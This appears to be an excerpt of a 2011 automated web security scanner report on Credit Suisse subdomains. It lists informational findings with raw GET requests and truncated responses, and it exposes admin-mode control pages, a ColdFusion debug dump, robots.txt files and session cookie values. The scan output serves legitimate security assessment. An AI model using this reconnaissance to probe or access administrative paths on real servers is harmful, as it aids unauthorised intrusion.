Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...

9.3. https://emagazine.credit-suisse.com/robots.txt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://emagazine.credit-suisse.com
Path:   /robots.txt

Request

GET /robots.txt HTTP/1.1
Host: emagazine.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:32 GMT
Server: Apache
Last-Modified: Wed, 06 Jul 2011 09:24:57 GMT
ETag: "1000000026698-3fb-4a7632c869803"
Accept-Ranges: bytes
Content-Length: 1019
Connection: close
Content-Type: text/plain

# robots.txt zu http://emagazine.credit-suisse.com


User-agent: Ultraseek
Allow: /

User-agent: Credit_Suisse_Search_Engine
Allow: /

User-agent: Credit Suisse Search Engine
Allow: /

Use
...[SNIP]...

9.4. https://infocus.credit-suisse.com/app/_control/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/_control/

Request

GET /app/_control/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:34:54 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:34:54 GMT
expires: Mon, 19 Sep 2011 15:34:54 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>EMAGAZINE [ ADMIN MODE ]</title>
<link rel="STYLESHEET" type="text/css" href="https://admin.emagazine.
...[SNIP]...

9.5. https://infocus.credit-suisse.com/app/_control/act_login_adminmode.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/_control/act_login_adminmode.cfm

Request

GET /app/_control/act_login_adminmode.cfm?lang=EN&client=&doid= HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:54 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:54 GMT
expires: Mon, 19 Sep 2011 15:38:54 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- OMNITURE ON//-->


<!-- SiteCatalyst code version: H.22.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->

...[SNIP]...

9.6. https://infocus.credit-suisse.com/app/_gen/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/_gen/

Request

GET /app/_gen/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:35:01 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:35:02 GMT
expires: Mon, 19 Sep 2011 15:35:02 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8

<script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<script type="text/javascript">/* <![CDATA[ */
   if (wind
...[SNIP]...

9.7. https://infocus.credit-suisse.com/app/_gen/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/_gen/index.cfm

Request

GET /app/_gen/index.cfm HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:39:01 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:39:01 GMT
expires: Mon, 19 Sep 2011 15:39:01 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8

<script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<script type="text/javascript">/* <![CDATA[ */
   if (wind
...[SNIP]...

9.8. https://infocus.credit-suisse.com/app/article/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/article/index.cfm

Request

GET /app/article/index.cfm?fuseaction=OpenArticle&aoid=318646&coid=118&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://www.credit-suisse.com/us/en/
Cookie: CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:34:35 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:34:35 GMT
expires: Mon, 19 Sep 2011 15:34:35 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...

9.9. https://infocus.credit-suisse.com/app/article/index3.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/article/index3.cfm

Request

GET /app/article/index3.cfm HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:29 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:29 GMT
expires: Mon, 19 Sep 2011 15:38:29 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


   <script language="JavaScript" type="text/javascript">
   <!--
       if(window.opener == undefined){
           location.href = "https://infocus.credit-suisse.com";
       }else{
           window.close();
       }
   //-->

...[SNIP]...

9.10. https://infocus.credit-suisse.com/app/print/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/print/

Request

GET /app/print/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:35:07 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:35:08 GMT
expires: Mon, 19 Sep 2011 15:35:08 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<link type='text/css' rel='stylesheet' href='/app/_css/FF.css'>

<div style="text-align:left; margin:15px;">
<img src="https://emagazine.credit-suisse.com/a
...[SNIP]...

9.11. https://infocus.credit-suisse.com/app/print/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/print/index.cfm

Request

GET /app/print/index.cfm HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:32 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:33 GMT
expires: Mon, 19 Sep 2011 15:38:33 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<link type='text/css' rel='stylesheet' href='/app/_css/FF.css'>

<div style="text-align:left; margin:15px;">
<img src="https://emagazine.credit-suisse.com/a
...[SNIP]...

9.12. https://infocus.credit-suisse.com/app/rss/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/rss/index.cfm

Request

GET /app/rss/index.cfm?fuseaction=OpenRSS&aoid=318646&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&aoid=318646&coid=118&lang=EN&bhjs=-1
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:38 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:38 GMT
expires: Mon, 19 Sep 2011 15:38:38 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...

9.13. https://infocus.credit-suisse.com/app/sendpage/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/sendpage/

Request

GET /app/sendpage/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:35:01 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:35:02 GMT
expires: Mon, 19 Sep 2011 15:35:02 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8

<style>


   table.cfdump_wddx,
   table.cfdump_xml,
   table.cfdump_struct,
   table.cfdump_varundefined,
   table.cfdump_array,
   table.cfdump_query,
   table.cfdump_cfc,
   table.cfdump_object,
   table.
...[SNIP]...

9.14. https://infocus.credit-suisse.com/app/sendpage/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/sendpage/index.cfm

Request

GET /app/sendpage/index.cfm HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:33 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:33 GMT
expires: Mon, 19 Sep 2011 15:38:33 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8

<style>


   table.cfdump_wddx,
   table.cfdump_xml,
   table.cfdump_struct,
   table.cfdump_varundefined,
   table.cfdump_array,
   table.cfdump_query,
   table.cfdump_cfc,
   table.cfdump_object,
   table.
...[SNIP]...

9.15. https://infocus.credit-suisse.com/app/topic/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/topic/index.cfm

Request

GET /app/topic/index.cfm?fuseaction=OpenTopic&coid=282917&lang=en HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:52 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:46:53 GMT
expires: Mon, 19 Sep 2011 15:46:53 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...

9.16. https://infocus.credit-suisse.com/data/rss/120658/EN/index.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /data/rss/120658/EN/index.xml

Request

GET /data/rss/120658/EN/index.xml HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/rss/
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:37 GMT
Server: Apache
Last-Modified: Mon, 19 Sep 2011 11:08:34 GMT
ETag: "1000000012795-ad36-4ad495d2d0cf0"
Accept-Ranges: bytes
Content-Length: 44342
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>


   <rss version="2.0">


<channel>
<title><![CDATA[Credit Suisse - Sports]]></title>
<link>https://infocus.credit-suisse.com</link
...[SNIP]...

9.17. https://infocus.credit-suisse.com/data/rss/120659/EN/index.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /data/rss/120659/EN/index.xml

Request

GET /data/rss/120659/EN/index.xml HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/rss/
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:37 GMT
Server: Apache
Last-Modified: Mon, 19 Sep 2011 11:07:23 GMT
ETag: "100000001279e-b4c3-4ad4958f7eec0"
Accept-Ranges: bytes
Content-Length: 46275
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>


   <rss version="2.0">


<channel>
<title><![CDATA[Credit Suisse - Culture]]></title>
<link>https://infocus.credit-suisse.com</lin
...[SNIP]...

9.18. https://infocus.credit-suisse.com/data/rss/129126/EN/index.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /data/rss/129126/EN/index.xml

Request

GET /data/rss/129126/EN/index.xml HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/rss/
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:36 GMT
Server: Apache
Last-Modified: Mon, 19 Sep 2011 11:05:54 GMT
ETag: "10000000127cb-ba9f-4ad4953a97470"
Accept-Ranges: bytes
Content-Length: 47775
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>


   <rss version="2.0">


<channel>
<title><![CDATA[Credit Suisse - Economy & Finance]]></title>
<link>https://infocus.credit-suiss
...[SNIP]...

9.19. https://infocus.credit-suisse.com/data/rss/172769/EN/index.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /data/rss/172769/EN/index.xml

Request

GET /data/rss/172769/EN/index.xml HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/rss/
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:36 GMT
Server: Apache
Last-Modified: Mon, 19 Sep 2011 13:00:26 GMT
ETag: "10000000127e6-b69d-4ad4aed42b4b0"
Accept-Ranges: bytes
Content-Length: 46749
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>


   <rss version="2.0">


<channel>
<title><![CDATA[Credit Suisse - In Focus]]></title>
<link>https://infocus.credit-suisse.com</li
...[SNIP]...

9.20. https://infocus.credit-suisse.com/data/rss/178706/EN/index.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /data/rss/178706/EN/index.xml

Request

GET /data/rss/178706/EN/index.xml HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/rss/
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:37 GMT
Server: Apache
Last-Modified: Sun, 18 Sep 2011 19:08:26 GMT
ETag: "10000000127f8-b4f8-4ad3bf379cdf0"
Accept-Ranges: bytes
Content-Length: 46328
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>


   <rss version="2.0">


<channel>
<title><![CDATA[Credit Suisse - Society]]></title>
<link>https://infocus.credit-suisse.com</lin
...[SNIP]...

9.21. https://infocus.credit-suisse.com/data/rss/188462/EN/index.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /data/rss/188462/EN/index.xml

Request

GET /data/rss/188462/EN/index.xml HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:53 GMT
Server: Apache
Last-Modified: Mon, 19 Sep 2011 11:01:10 GMT
ETag: "100000001280f-d9ea-4ad4942b58ff0"
Accept-Ranges: bytes
Content-Length: 55786
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>


   <rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0">


<channel>
<title><![CDATA[Credit Suisse - Economy & Busi
...[SNIP]...

9.22. https://infocus.credit-suisse.com/data/rss/221715/EN/index.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /data/rss/221715/EN/index.xml

Request

GET /data/rss/221715/EN/index.xml HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:54 GMT
Server: Apache
Last-Modified: Sun, 18 Sep 2011 19:03:20 GMT
ETag: "1000000012845-4ff2-4ad3be141f180"
Accept-Ranges: bytes
Content-Length: 20466
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>


   <rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0">


<channel>
<title><![CDATA[Credit Suisse - Global Investo
...[SNIP]...

9.23. https://infocus.credit-suisse.com/data/rss/282908/EN/index.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /data/rss/282908/EN/index.xml

Request

GET /data/rss/282908/EN/index.xml HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:53 GMT
Server: Apache
Last-Modified: Sun, 18 Sep 2011 19:01:33 GMT
ETag: "1000000012853-cfc8-4ad3bdada94f0"
Accept-Ranges: bytes
Content-Length: 53192
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>


   <rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0">


<channel>
<title><![CDATA[Credit Suisse TV]]></title>

...[SNIP]...

9.24. https://infocus.credit-suisse.com/data/rss/285457/EN/index.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /data/rss/285457/EN/index.xml

Request

GET /data/rss/285457/EN/index.xml HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:54 GMT
Server: Apache
Last-Modified: Sun, 18 Sep 2011 19:00:45 GMT
ETag: "100000001289b-4444-4ad3bd7fe9e20"
Accept-Ranges: bytes
Content-Length: 17476
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>


   <rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0">


<channel>
<title><![CDATA[Our Commitment]]></title>

...[SNIP]...

9.25. https://infocus.credit-suisse.com/jamez_customtags/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /jamez_customtags/

Request

GET /jamez_customtags/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:47 GMT
Server: Apache
Last-Modified: Wed, 03 Mar 2010 11:04:02 GMT
ETag: "100000002a048-1d0-480e370a8fddf"
Accept-Ranges: bytes
Content-Length: 464
Connection: close
Content-Type: text/html

<body bgcolor="#FFFFFF">
<br>
<table cellpadding="2" cellspacing="2" width="330" align="center">
<tr>
<td align="center"><img src="logo.gif" alt="" border="0" align="middle"></td>
</t
...[SNIP]...

9.26. https://infocus.credit-suisse.com/robots.txt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /robots.txt

Request

GET /robots.txt HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:35:21 GMT
Server: Apache
Last-Modified: Wed, 06 Jul 2011 09:24:57 GMT
ETag: "1000000026698-3fb-4a7632c869803"
Accept-Ranges: bytes
Content-Length: 1019
Connection: close
Content-Type: text/plain

# robots.txt zu http://emagazine.credit-suisse.com


User-agent: Ultraseek
Allow: /

User-agent: Credit_Suisse_Search_Engine
Allow: /

User-agent: Credit Suisse Search Engine
Allow: /

Use
...[SNIP]...

9.27. https://responsibility.credit-suisse.com/app/_control/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/_control/

Request

GET /app/_control/ HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://responsibility.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:33:20 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:21 GMT
expires: Mon, 19 Sep 2011 15:33:21 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
